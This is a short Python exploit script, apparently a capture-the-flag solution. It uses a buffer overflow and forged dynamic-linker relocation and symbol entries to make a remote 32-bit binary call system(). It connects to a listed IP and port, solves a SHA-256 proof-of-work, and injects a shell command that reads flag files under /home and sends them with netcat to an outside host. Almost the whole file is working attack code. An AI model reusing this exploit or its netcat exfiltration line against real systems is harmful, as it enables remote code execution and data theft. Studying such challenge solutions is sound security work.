import phun
symtab = 0x80481cc
strtab = 0x804822c
jmprel = 0x80482b0
reloc_idx = 0x2a0
baddr  = reloc_idx*16+symtab  - 8
# reloc
fake = ''
fake += phun.p32(baddr,7 | (reloc_idx<<8))
fake += phun.p32(baddr + 12 - strtab)
fake += "system\x00cat /home/*/flag | nc lokalhost.pl 1234\x00"


## symbol
fake_sym = ''

# ## string
# fake_sym += "write\x00".ljust(32,"\x00")

reset = 0x804843B
r = phun.Remote('202.120.7.202',6666)
#r = phun.Remote('localhost',1111)

p = "a"*0x2c
p += phun.p32(0x8048300,reset,0,baddr,len(fake))
p += fake
        # print len(p)
# r.write(p)
# print len(fake)
#r.write(fake)
p += "a"*0x2c
p += phun.p32(0x804830B ,baddr - jmprel, 0xdeadbeef, baddr+12+7)
# print len(p)
import hashlib
def do_pow(chal):

    for i in xrange(2**32):
        sol = chr(i&0xff) + chr((i>>8)&0xff) + chr((i>>16)&0xff) + chr((i>>24)&0xff)
        if hashlib.sha256(chal + sol).digest().startswith('\0\0\0'):
            return sol
        
    raise "NO POW:("
chal = r.readline().strip()
r.write(do_pow(chal))
print len(p)
r.write(p)




# print len(fake)
# p = 'c'*0x2c
# p += phun.p32(0x804830B ,)
# r.write(p.ljust(0x40,"\x00"))
# r.shell()